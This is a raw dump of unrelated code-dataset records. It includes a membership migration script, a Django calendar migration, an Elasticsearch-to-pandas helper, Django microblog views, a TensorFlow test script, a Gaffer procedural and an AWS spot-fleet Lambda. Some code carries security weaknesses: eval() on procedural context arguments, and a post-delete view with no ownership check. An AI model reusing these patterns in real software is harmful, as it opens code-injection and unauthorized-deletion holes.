begin/end ###\n years = payment.Year.split('-')\n\n # special for FYs2011-2012\n if payment.Year == '2010-2011':\n if member['pk'] in paid_2011:\n begin = date(2011, 1, 1)\n end = date(2011, 12, 31)\n else:\n begin = date(2010, 10, 1)\n end = date(2011, 9, 30)\n\n elif payment.Year == '2012':\n if member['pk'] in paid_2011:\n begin = date(2012, 1, 1)\n else: \n begin = date(2011, 10, 1)\n end = date(2012, 12, 31)\n\n else:\n # one year, jan-dec\n if len(years) == 1: \n year = int(years[0])\n begin = date(year, 1, 1)\n end = date(year, 12, 31)\n # two years, oct-sep\n else:\n begin, end = years\n begin = date(int(begin), 10, 1)\n end = date(int(end), 9, 30)\n\n new_payment['fields']['begin'] = begin\n new_payment['fields']['end'] = end\n\n data.append(new_payment)\n\n return data\n\ndef generate_sub_payments(member, payments):\n data = []\n ### subscription payments ###\n for payment in payments:\n if not payment.paid_subscriptions:\n continue \n\n def new_payment():\n return {\n 'model': 'hq.subscriptionpayment',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n },\n }\n\n year = int(payment.Year[-4:])\n ### journal ###\n if payment.Journal or payment.Comp_Journal or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'journal'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = bool(payment.Comp_Journal)\n data.append(jp)\n\n ### bulletin ###\n if payment.Bulletin or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'bulletin'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n\n ### solar ###\n if payment.Solar_Bulletin or payment.Comp_Solar or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'solar'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = bool(payment.Comp_Solar)\n data.append(jp)\n\n ### newsletter ###\n if payment.Paper_Newsletter or payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'newsletter'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n\n ### annual report ###\n if payment.All_Pubs:\n jp = new_payment()\n jp['fields']['publication'] = 'annual'\n jp['fields']['paid'] = date(year, 1, 1)\n jp['fields']['year'] = year\n jp['fields']['complementary'] = False\n data.append(jp)\n return data\n\ndef generate_member_certs(meta, member):\n engine = meta.bind\n cert_t = meta.tables['member_certifications']\n\n certs = engine.execute(cert_t.select()\n .where(cert_t.c.member_id == member['pk']))\n\n data = []\n for cert in certs:\n new_cert = {\n 'model': 'hq.membercertification',\n 'pk': None,\n 'fields': {\n 'member_id': member['pk'],\n 'certification_id': int(cert.certification_id),\n 'completed': cert.date_completed,\n 'instructor': bool(cert.instructor),\n },\n }\n\n data.append(new_cert)\n return data\n\nr_obsaward = re.compile(r'([0-9.]+)([kK]?)\\s*(\\d{4})')\ndef gen_obs_awards(row, history, typ):\n data = []\n awards = r_obsaward.findall(history)\n for award in awards:\n level = float(award[0])\n year = int(award[2])\n if award[1] in ('k', 'K'):\n level = int(level * 1000)\n\n data.append({\n 'model': 'hq.memberobsaward',\n 'pk': None,\n 'fields': {\n 'obs_award_id': typ,\n 'member_id': int(row.memberID),\n 'level': level,\n 'year': year,\n },\n })\n return data\n\ndef generate_obs_awards(row):\n data = []\n\n if row.vis_award_history:\n data.extend(gen_obs_awards(row, row.vis_award_history, 1))\n if row.ccd_award_history:\n data.extend(gen_obs_awards(row, row.ccd_award_history, 2))\n if row.pep_award_history:\n data.extend(gen_obs_awards(row, row.pep_award_history, 3))\n if row.ptg_award_history:\n data.extend(gen_obs_awards(row, row.ptg_award_history, 4))\n if row.solar_award_history:\n data.extend(gen_obs_awards(row, row.solar_award_history, 5))\n\n return data\n\n\nclass Required(object): pass\ntable_fields = {\n 'organization': (\n ('id', Required),\n ('name', Required),\n ('abbreviation', Required),\n ),\n 'certification': (\n ('id', Required),\n ('name', Required),\n ),\n 'obsaward': (\n ('id', Required),\n ('name', Required),\n ),\n 'member': (\n ('id', Required),\n ('obscode', None),\n ('title', ''),\n ('given_name', Required),\n ('middle_name', ''),\n ('family_name', Required),\n ('name_suffix', ''),\n\n ('organization', ''),\n ('address1', ''),\n ('address2', ''),\n ('city', ''),\n ('region', ''),\n ('postal', ''),\n ('country', ''),\n ('phone1', ''),\n ('phone2', ''),\n ('email',''),\n ('email_optout',0),\n \n ('special_membership', ''),\n ('created', Required),\n ('updated', Required),\n ('observer_added', None),\n ('member_joined', None),\n ('astronomer', 0),\n ('institution', 0),\n ('council', 0),\n ('staff', 0),\n ('address_invalid', 0),\n ('resigned', 0),\n ('deceased', 0),\n ('solar_observer', 0),\n ('notes', ''),\n ('observer_notes', ''),\n\n ('latitude', None),\n ('longitude', None),\n ('profession', 0),\n ('affiliation_id', Required),\n ('nickname', ''),\n ('birthdate', None),\n ('howheard', ''),\n ('experience', ''),\n ('equipment', ''),\n ('member_notes', ''),\n ),\n 'payment': (\n ('id', Required),\n ('member_id', Required), \n ('type', Required), \n ('amount', Required), \n ('begin', Required),\n ('end', Required),\n ),\n\n 'subscriptionpayment': (\n ('id', Required),\n ('member_id', Required), \n ('publication', Required),\n ('paid', Required),\n ('year', Required),\n ('complementary', False),\n ),\n 'membercertification': (\n ('id', Required),\n ('member_id', Required),\n ('certification_id', Required),\n ('completed', Required),\n ('instructor', Required),\n ),\n 'memberobsaward': (\n ('id', Required),\n ('obs_award_id', Required),\n ('member_id', Required),\n ('level', Required),\n ('year', Required),\n ),\n}\n\nconn = mysqldb.connect(**DB)\ndef sqlize(val):\n if type(val) == unicode:\n val = val.encode('utf8')\n val = conn.escape(val)\n return str(val)\n\ndef generate_mysql(data):\n sql = '''INSERT INTO hq_{table} {fields} \\nVALUES {values};\\n\\n'''\n ret = ''\n \n for table in data:\n rows = []\n for row in data[table]:\n vals = []\n for field in table_fields[table]:\n fname, default = field\n if fname == 'id':\n val = row.get('pk', Required)\n else:\n val = row['fields'].get(fname, default)\n\n if val == Required:\n raise Exception(\"Field '{}' is required for table '{}':\\n{}\"\n .format(fname, table, pformat(row)))\n\n vals.append(sqlize(val))\n rows.append('(' + ','.join(vals) + ')')\n\n QSIZE = 1000\n while len(rows):\n ret += sql.format(\n table=table,\n fields='(' + ','.join([t[0] for t in table_fields[table]]) + ')',\n values=',\\n'.join(rows[:QSIZE]),\n )\n rows = rows[QSIZE:]\n\n return ret\n \n\ndef main(argv):\n meta = init()\n engine = meta.bind\n\n member_t = meta.tables['members']\n payment_t = meta.tables['payments']\n paid_2011_t = meta.tables['paid_2011']\n\n members = engine.execute(member_t.select()\n #.where(member_t.c.memberID == 17285)\n )\n paid_2011 = [x.member_id for x in engine.execute(paid_2011_t.select())\n .fetchall()]\n\n data = {\n 'organization': [],\n 'certification': [],\n 'obsaward': [],\n 'member': [],\n 'payment': [],\n 'subscriptionpayment': [],\n 'membercertification': [],\n 'memberobsaward': [],\n }\n data['organization'] = organizations(meta)\n data['certification'] = certifications(meta)\n data['obsaward'] = obs_awards(meta)\n total = 0\n processed = 0\n aborted = 0\n for row in members:\n total += 1\n ### get member's payments ###\n payments = engine.execute(payment_t.select()\n .where(payment_t.c.MemberID == row.memberID)).fetchall()\n\n try:\n member = generate_member(row, payments)\n #data['member'].append(member)\n\n #data['payment'].extend(\n # generate_payments(member, payments, paid_2011))\n data['subscriptionpayment'].extend(\n generate_sub_payments(member, payments))\n #data['membercertification'].extend(\n # generate_member_certs(meta, member))\n #data['memberobsaward'].extend(generate_obs_awards(row))\n\n processed +=1 \n\n except AbortMember as e:\n aborted +=1\n continue \n\n except Exception as e:\n aborted +=1\n print(\"Exception processing Member #\" + str(row.memberID), \n file=sys.stderr)\n traceback.print_exc(file=sys.stderr)\n\n print(\"Total processed: \" + str(total), file=sys.stderr)\n print(\"Successfully migrated: \" + str(processed), file=sys.stderr)\n print(\"Aborted: \" + str(aborted), file=sys.stderr)\n\n print(generate_mysql(data))\n print(member_errors, file=sys.stderr)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"hq/scripts/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":27586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646849115","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport social.apps.django_app.default.fields\nfrom django.conf import settings\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('default', '0003_alter_email_max_length'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Appointment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ],\n ),\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('title', models.CharField(max_length=100)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('extra_data', social.apps.django_app.default.fields.JSONField(default=b'{}')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),\n ('social_auth_owner', models.ForeignKey(related_name='owned_calendars', to='default.UserSocialAuth', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('title', models.CharField(max_length=100)),\n ('extra_data', social.apps.django_app.default.fields.JSONField(default=b'{}')),\n ('calendar_owner', models.ForeignKey(related_name='owned_events', to='core.Calendar', null=True)),\n ('calendars', models.ManyToManyField(related_name='appointed_events', through='core.Appointment', to='core.Calendar')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('visible', models.BooleanField(default=False)),\n ('writable', models.BooleanField(default=False, editable=False)),\n ('calendar', models.ForeignKey(to='core.Calendar')),\n ('subscriber', models.ForeignKey(related_name='calendars', to='default.UserSocialAuth')),\n ],\n ),\n migrations.AddField(\n model_name='calendar',\n name='subscribers',\n field=models.ManyToManyField(related_name='subscribed_calendars', through='core.Subscription', to='default.UserSocialAuth'),\n ),\n migrations.AddField(\n model_name='appointment',\n name='calendar',\n field=models.ForeignKey(related_name='events', to='core.Calendar'),\n ),\n migrations.AddField(\n model_name='appointment',\n name='event',\n field=models.ForeignKey(to='core.Event'),\n ),\n ]\n","sub_path":"core/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"166649510","text":"from builtins import object\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search\nfrom pandas.io.json import json_normalize\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\nclass ElasticDF(object):\n '''\n The ElasticDF() class searches Elastic and returns results as a Pandas\n DataFrame. This makes it easier to work with the search results with\n standard data analysis techniques.\n\n Example usage:\n\n # Create a plaintext connection to the Elastic server, no authentication\n e = ElasticDF(url=\"http://localhost:9200\")\n\n # The same, but with SSL and authentication\n e = ElasticDF(url=\"https://localhost:9200\", ssl=True, username=\"myuser\",\n password=\"mypass\")\n\n # Fetch search results from an index or index pattern for the previous day\n df = e.search_df(lucene=\"item:5282 AND color:red\", index=\"myindex-*\", days=1)\n\n # The same, but do not flatten structures into individual columns.\n # This will result in each structure having a single column with a\n # JSON string describing the structure.\n df = e.search_df(lucene=\"item:5282 AND color:red\", index=\"myindex-*\", days=1,\n normalize=False)\n\n # A more complex example, showing how to set the Elastic document type,\n # use Python-style datetime objects to constrain the search to a certain\n # time period, and a user-defined field against which to do the time \n # comparisons.\n df = e.search_df(lucene=\"item:5285 AND color:red\", index=\"myindex-*\",\n doctype=\"doc\", date_field=\"mydate\",\n start_time=datetime.now() - timedelta(days=8),\n end_time=datetime.now() - timedelta(days=6))\n '''\n\n es_conn = None # The connection to the ES server\n\n def __init__(self, url=None, timeout=250, ssl=False, username=\"\", password=\"\", verify_certs=True, ca_certs=None):\n '''\n Create the ElasticDF object and log into the Elastic server.\n '''\n\n self.es_conn = Elasticsearch(\n url,\n timeout=timeout,\n use_ssl=ssl,\n verify_certs=verify_certs,\n ca_certs=ca_certs,\n http_auth=(username, password)\n )\n\n def search(self, lucene, index=\"*\", doctype=\"doc\", fields=None,\n date_field=\"@timestamp\", days=None, start_time=None,\n end_time=None):\n '''\n Search Elastic and return the results as a list of dicts.\n\n lucene: A string containing the Elastic search (e.g., 'item:5282 AND color:red')\n index: A string containing the index name to search, or an index name pattern\n if you want to search multiple indices (e.g., 'myindex' or 'myindex-*')\n doctype: The document type you are interested in.\n fields: A string containing a comma-separated list of field names to return.\n The default is to return all fields, but using this list you can\n select only certain fields, which may make things a bit faster.\n date_field: The name of the field used for date/time comparison.\n days: Search the past X days. If provided, this supercedes both start_time\n and end_time.\n start_time: A datetime() object representing the start of the search\n window. If used without end_time, the end of the search\n window is the current time.\n end_time: A datetime() object representing the end of the search window.\n If used without start_time, the search start will be the earliest\n time in the index.\n '''\n\n s = Search(using=self.es_conn, index=index, doc_type=doctype)\n\n s = s.query(\"query_string\", query=lucene)\n\n if fields:\n s = s.source(fields.split(','))\n\n # Add timestamp filters, if provided. Days takes precendence over\n # use of either/both of start_time and end_time.\n # Note the weird unpacked dictionary syntax in the call to s.filter().\n # We have to do it this way because Python has an issue naming things\n # with \"@\" in them, but the default timestamp field in many ES servers is\n # \"@timestamp\".\n # ref: https://github.com/elastic/elasticsearch-dsl-py/blob/master/docs/search_dsl.rst\n if days:\n end = datetime.now()\n start = end - timedelta(days=days)\n s = s.filter('range', ** {date_field: {\"gte\": start, \"lte\": end}})\n elif start_time and not end_time:\n s = s.filter('range', ** {date_field: {\"gte\": start_time}})\n elif end_time and not start_time:\n s = s.filter('range', ** {date_field: {\"lte\": end_time}})\n elif start_time and end_time:\n s = s.filter('range', ** {date_field: {\"gte\": start_time, \"lte\": end_time}})\n\n # execute the search\n results = s.scan()\n\n for hit in results:\n yield hit.to_dict()\n\n def search_df(self, lucene, index=\"*\", doctype=\"doc\", fields=None, date_field=\"@timestamp\", days=None, start_time=None, end_time=None, normalize=True):\n '''\n Search Elastic and return the results as a Pandas DataFrame.\n\n lucene: A string containing the Elastic search (e.g., 'item:5282 AND color:red')\n index: A string containing the index name to search, or an index name pattern\n if you want to search multiple indices (e.g., 'myindex' or 'myindex-*')\n doctype: The document type you are interested in.\n fields: A string containing a comma-separated list of field names to return.\n The default is to return all fields, but using this list you can\n select only certain fields, which may make things a bit faster.\n date_field: The name of the field used for date/time comparison.\n days: Search the past X days. If provided, this supercedes both start_time\n and end_time.\n start_time: A datetime() object representing the start of the search\n window. If used without end_time, the end of the search\n window is the current time.\n end_time: A datetime() object representing the end of the search window.\n If used without start_time, the search start will be the earliest\n time in the index.\n normalize: If set to True, fields containing structures (i.e. subfields)\n will be flattened such that each field has it's own column in\n the dataframe. If False, there will be a single column for the\n structure, with a JSON string encoding all the contents.\n '''\n results = list()\n\n for hit in self.search(lucene=lucene, index=index, doctype=doctype,\n fields=fields, date_field=date_field, days=days,\n start_time=start_time, end_time=end_time):\n results.append(hit)\n\n if normalize:\n df = json_normalize(results)\n else:\n df = pd.DataFrame(results)\n\n return df\n","sub_path":"huntlib/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"224650979","text":"from django.contrib.auth.decorators import login_required\nfrom django.db.models import Count, Q, F\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\nfrom django.views.generic import ListView\nfrom django.views.generic.edit import FormMixin\nfrom likes.models import Reaction\nfrom mikroblog.forms import MicroPostForm\nfrom mikroblog.models import MicroPost\nfrom tag.forms import TagForm\nfrom tag.models import Tag\nfrom django.contrib import messages\n\n\nclass MicroPostListView(ListView, FormMixin):\n model = MicroPost\n template_name = 'microblog/microblog.html'\n context_object_name = 'posts'\n form_class = MicroPostForm\n paginate_by = 10\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n return MicroPost.objects.all().annotate(\n likes=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE)),\n is_liked=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE,\n reactions__owner=self.request.user))).order_by('-date_posted',\n 'likes')\n else:\n return MicroPost.objects.all().annotate(\n likes=Count('reactions', filter=Q(reactions__type=Reaction.Type.UPVOTE))).order_by('-date_posted',\n 'likes')\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n data['popular_tags'] = Tag.objects.all().annotate(ilosc=Count('micro_posts')).order_by('-ilosc')[:20]\n data['popular_posts'] = MicroPost.objects.all().annotate(\n likes=Count('reactions', filr=Q(reactions__type=Reaction.Type.UPVOTE)))\n\n data['micro_post_form'] = MicroPostForm(initial={'author': self.request.user.id})\n data['tags_form'] = TagForm()\n\n return data\n\n def post(self, request, *args, **kwargs):\n form = self.get_form(MicroPostForm)\n tag_form = self.get_form(TagForm)\n if form.is_valid() & tag_form.is_valid():\n micropost = form.save()\n tags_data = tag_form.cleaned_data['word'].split(',')\n for word in tags_data:\n used_tag = Tag.objects.filter(word=word)\n if used_tag.exists():\n micropost.tag.add(used_tag[0])\n else:\n tag = Tag.objects.create(word=word)\n micropost.tag.add(tag)\n return super(MicroPostListView, self).form_valid(form)\n\n def get_success_url(self):\n return reverse('mikroblog')\n\n\n@login_required\ndef micro_post_delete(request, pk):\n micro_post = get_object_or_404(MicroPost, pk=pk)\n micro_post.delete()\n messages.warning(request, 'Wpis został usunięty!')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef micro_post_like(request, pk):\n micro_post = get_object_or_404(MicroPost, pk=pk)\n type = Reaction.Type.UPVOTE\n like, created = Reaction.objects.get_or_create(micro_post=micro_post, owner=request.user, type=type)\n if not created:\n like.delete()\n else:\n like.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n","sub_path":"socialNewsApp/src/mikroblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"335317678","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom nets import nets_factory\nimport argparse\nimport os.path\nimport re\nimport sys\nimport tarfile\nimport numpy as np\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\nimport pandas as pd\nimport time\nimport cv2\nfrom preprocessing import preprocessing_factory\n\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', '/tmp/tfmodel/',\n 'The directory where the model was written to or an absolute path to a '\n 'checkpoint file.')\ntf.app.flags.DEFINE_string(\n 'test_dir', '.', 'Test image directory.')\ntf.app.flags.DEFINE_string(\n 'preprocessing_name', None, 'The name of the preprocessing to use. If left '\n 'as `None`, then the model_name flag is used.')\ntf.app.flags.DEFINE_string(\n 'model_name', 'inception_v4', 'The name of the architecture to evaluate.')\nFLAGS = tf.app.flags.FLAGS\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n # Creates graph from saved graph_def.pb.\n with tf.gfile.FastGFile(FLAGS.model_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\ndef preprocess_for_eval(image, height, width,\n central_fraction=0.875, scope=None):\n with tf.name_scope(scope, 'eval_image', [image, height, width]):\n if image.dtype != tf.float32:\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n # Crop the central region of the image with an area containing 87.5% of\n # the original image.\n if central_fraction:\n image = tf.image.central_crop(image, central_fraction=central_fraction)\n\n if height and width:\n # Resize the image to the specified height and width.\n image = tf.expand_dims(image, 0)\n image = tf.image.resize_bilinear(image, [height, width],\n align_corners=False)\n image = tf.squeeze(image, [0])\n image = tf.subtract(image, 0.5)\n image = tf.multiply(image, 2.0)\n return image\n\ndef main(_):\n imn=[]\n label=[]\n \n with tf.Graph().as_default():\n \n \n network_fn = nets_factory.get_network_fn(FLAGS.model_name,num_classes=5,is_training=False)\n preprocessing_name = FLAGS.preprocessing_name or FLAGS.model_name\n image_preprocessing_fn = preprocessing_factory.get_preprocessing(preprocessing_name,is_training=False)\n \n if tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n else:\n checkpoint_path = FLAGS.checkpoint_path\n batch_size = 16\n tensor_input = tf.placeholder(tf.float32, [None, 299, 299, 3])\n logits, _ = network_fn(tensor_input)\n logits = tf.nn.top_k(logits, 1)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n rootpath=your_path\n test_ids=os.listdir(rootpath)\n tot = len(test_ids)\n \n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, checkpoint_path)\n for idx in range(0, tot, batch_size):\n images = list()\n idx_end = min(tot, idx + batch_size)\n print(idx)\n for i in range(idx, idx_end):\n image_id = test_ids[i]\n imn.append(test_ids[i])\n test_path = os.path.join(FLAGS.test_dir, image_id)\n \n image = open(test_path, 'rb').read()\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n processed_image = image_preprocessing_fn(image, 299, 299)\n \n processed_image = tf.subtract(image, 0.5)\n processed_image = tf.multiply(processed_image, 2.0)\n processed_image = sess.run(processed_image)\n images.append(processed_image)\n images = np.array(images)\n predictions = sess.run(logits, feed_dict = {tensor_input : images}).indices\n label.extend(predictions)\n \n csvpath=\"your_path\"+'test.csv'\n dataframe = pd.DataFrame({'filenames':imn,'labels':label})\n dataframe.to_csv(csvpath,sep=',') \nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"batch_test.py","file_name":"batch_test.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"597407238","text":"##########################################################################\n#\n# Copyright (c) 2012, John Haddon. All rights reserved.\n# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\nfrom __future__ import with_statement\n\nimport IECore\n\nimport Gaffer\nimport GafferScene\n\nclass ScriptProcedural( IECore.ParameterisedProcedural ) :\n\n\tdef __init__( self ) :\n\n\t\tIECore.ParameterisedProcedural.__init__( self, \"Generates geometry from a node within a .gfr script.\" )\n\n\t\tself.parameters().addParameters(\n\n\t\t\t[\n\n\t\t\t\tIECore.FileNameParameter(\n\t\t\t\t\tname = \"fileName\",\n\t\t\t\t\tdescription = \"The gaffer script which contains a scene to generate geometry from.\",\n\t\t\t\t\tallowEmptyString = False,\n\t\t\t\t\tcheck = IECore.FileNameParameter.CheckType.MustExist,\n\t\t\t\t\textensions = \"gfr\",\n\t\t\t\t),\n\n\t\t\t\tIECore.StringParameter(\n\t\t\t\t\tname = \"node\",\n\t\t\t\t\tdescription = \"The node to generate geometry from.\",\n\t\t\t\t\tdefaultValue = \"\",\n\t\t\t\t),\n\n\t\t\t\tIECore.FloatParameter(\n\t\t\t\t\tname = \"frame\",\n\t\t\t\t\tdescription = \"The frame to generate geometry at.\",\n\t\t\t\t\tdefaultValue = 1,\n\t\t\t\t),\n\n\t\t\t\tIECore.StringVectorParameter(\n\t\t\t\t\tname = \"context\",\n\t\t\t\t\tdescription = \"Additional context entries to be used during rendering.\",\n\t\t\t\t\tdefaultValue = IECore.StringVectorData( [] ),\n\t\t\t\t\tuserData = {\n\t\t\t\t\t\t\"parser\" : {\n\t\t\t\t\t\t\t\"acceptFlags\" : IECore.BoolData( True ),\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t),\n\n\t\t\t]\n\n\t\t)\n\n\t\tself.__currentFileName = None\n\n\tdef doBound( self, args ) :\n\n\t\tplug, context = self.__plugAndContext( args )\n\t\tif plug is None :\n\t\t\treturn IECore.Box3f()\n\n\t\tsceneProcedural = GafferScene.SceneProcedural( plug, context, \"/\" )\n\t\treturn sceneProcedural.bound()\n\n\tdef doRender( self, renderer, args ) :\n\n\t\tplug, context = self.__plugAndContext( args )\n\t\tif plug is None :\n\t\t\treturn\n\n\t\tself.__postExpansionCacheClearConnection = GafferScene.SceneProcedural.allRenderedSignal().connect( Gaffer.WeakMethod( self.__allRendered ) )\n\t\t\n\t\tsceneProcedural = GafferScene.SceneProcedural( plug, context, \"/\" )\n\t\trenderer.procedural( sceneProcedural )\n\n\tdef __allRendered( self ):\n\t\t\n\t\t# all the procedural expansion's done, so lets clear the value plug cache/object pool to free up a bit of memory:\n\t\tself.__postExpansionCacheClearConnection = None\n\n\t\tIECore.ObjectPool.defaultObjectPool().clear()\n\t\tmemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()\n\t\tGaffer.ValuePlug.setCacheMemoryLimit( 0 )\n\t\tGaffer.ValuePlug.setCacheMemoryLimit( memoryLimit )\n\n\tdef __plugAndContext( self, args ) :\n\n\t\tif args[\"fileName\"].value != self.__currentFileName :\n\n\t\t\tif args[\"fileName\"].value == \"\" :\n\t\t\t\tself.__scriptNode = None\n\t\t\telse :\n\t\t\t\tself.__scriptNode = Gaffer.ScriptNode()\n\t\t\t\tself.__scriptNode[\"fileName\"].setValue( args[\"fileName\"].value )\n\t\t\t\tself.__scriptNode.load( continueOnError = True )\n\t\t\t\tself.__currentFileName = args[\"fileName\"].value\n\n\t\tif self.__scriptNode is None :\n\t\t\treturn None, None\n\n\t\tif not args[\"node\"].value :\n\t\t\treturn None, None\n\n\t\tnode = self.__scriptNode.descendant( args[\"node\"].value )\n\n\t\tcontext = Gaffer.Context( self.__scriptNode.context() )\n\t\tcontext.setFrame( args[\"frame\"].value )\n\n\t\tfor i in range( 0, len(args[\"context\"]), 2 ) :\n\t\t\tentry = args[\"context\"][i].lstrip( \"-\" )\n\t\t\tcontext[entry] = eval( args[\"context\"][i+1] )\n\n\t\treturn node[\"out\"], context\n\nIECore.registerRunTimeTyped( ScriptProcedural, typeName = \"GafferScene::ScriptProcedural\" )\n","sub_path":"python/GafferScene/ScriptProcedural.py","file_name":"ScriptProcedural.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481117111","text":"#*************************************************\n# lambda_function.lambda_handler\n# recuedas necesitas permisos sobre el lambda startInstance y stopInstance\n#*************************************************\nimport boto3\n\nimport json\nregion = 'us-east-1'\n\ndef lambda_handler(event, context):\n ec2 = boto3.client('ec2', region_name=region)\n ec2.modify_spot_fleet_request( SpotFleetRequestId='sfr-1111111-1111-1111-1111-111111111111',\n TargetCapacity=0)\n return {\n 'statusCode': 200,\n 'body': json.dumps('stop your instances: ')\n }\n\n","sub_path":"LambdaAndSpotFleet/Spot_stop_instances.py","file_name":"Spot_stop_instances.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602293102","text":"\nimport numpy as np\nimport tensorflow as tf\nimport tensorboard\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import preprocessing\n\n\nTrain_labels = np.loadtxt(\"./train_labels\")\nTrain_data = np.loadtxt(\"./train_data\")\nTrain_data = np.reshape(Train_data,(8546,10,10,3))\nTrain_labels = np.reshape(Train_labels,(8546,6))\n\nTest_labels = np.loadtxt(\"./test_labels\")\nTest_data = np.loadtxt(\"./test_data\")\nTest_data = 